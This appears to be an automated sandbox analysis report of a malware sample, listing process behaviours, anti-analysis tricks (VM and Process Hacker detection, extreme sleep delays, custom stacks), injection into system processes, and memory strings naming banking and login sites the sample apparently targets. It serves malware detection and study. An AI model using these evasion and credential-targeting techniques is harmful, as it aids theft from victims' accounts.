Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\x.exe	API/Special instruction interceptor: Address: DE3214
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\sxstrace.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: x.exe, 00000005.00000003.1470193982.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.1490919950.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000003.1469039541.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000003.1468879547.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000003.1468464069.0000000000995000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCESSHACKER.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_03B5BBA0 rdtsc

6_2_03B5BBA0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2966	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3083	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Window / User API: threadDelayed 4215	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe	Window / User API: threadDelayed 5759	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_5-105149

Source: C:\Users\user\AppData\Local\Temp\x.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 7260	Thread sleep count: 4215 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 7260	Thread sleep time: -8430000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 7260	Thread sleep count: 5759 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sxstrace.exe TID: 7260	Thread sleep time: -11518000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\cqDOSjkyAzfeRfhnkEqslpltZuimWzTBJajICntoVIXuCnKXTeR\qVTSNa7tUPbuzPK.exe TID: 1916	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sxstrace.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sxstrace.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00E8445A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8C6D1 FindFirstFileW,FindClose,	5_2_00E8C6D1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_00E8C75C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00E8EF95
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00E8F0F2
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_00E8F3F3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00E837EF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00E83B12
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 5_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	5_2_00E8BCBC

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00E249A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000003.1549581108.0000026A5EBC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: wscript.exe, 00000000.00000003.1435846792.0000026A5EE4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: G1Y9-55.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: G1Y9-55.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: G1Y9-55.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: sxstrace.exe, 00000009.00000002.2698159612.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: G1Y9-55.9.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: wscript.exe, 00000000.00000003.1548696809.0000026A5C2EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550498392.0000026A5C2F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1549337790.0000026A5C2F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: G1Y9-55.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wscript.exe, 00000000.00000002.1550933290.0000026A5E9C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sxstrace.exe, 00000009.00000002.2698159612.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zure.comVMware20,11696492231j
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: G1Y9-55.9.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: G1Y9-55.9.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: sxstrace.exe, 00000009.00000002.2698159612.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,1169649
Source: qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2694308693.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2107342433.000002071CDFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: G1Y9-55.9.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: sxstrace.exe, 00000009.00000002.2698159612.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ice.comVMware20,11696492231s
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: G1Y9-55.9.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: G1Y9-55.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: G1Y9-55.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: G1Y9-55.9.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: wscript.exe, 00000000.00000003.1549337790.0000026A5C310000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550498392.0000026A5C310000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+0\j
Source: G1Y9-55.9.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: x.exe, 00000005.00000002.1491351865.0000000000A25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe`
Source: powershell.exe, 00000003.00000002.1542246432.0000024924E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\j
Source: G1Y9-55.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: G1Y9-55.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: G1Y9-55.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: sxstrace.exe, 00000009.00000002.2698159612.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,1169649
Source: wscript.exe, 00000000.00000003.1549526667.0000026A5EEC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: G1Y9-55.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: G1Y9-55.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: G1Y9-55.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: G1Y9-55.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\AppData\Local\Temp\x.exe

API call chain: ExitProcess graph end node

graph_5-104339

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

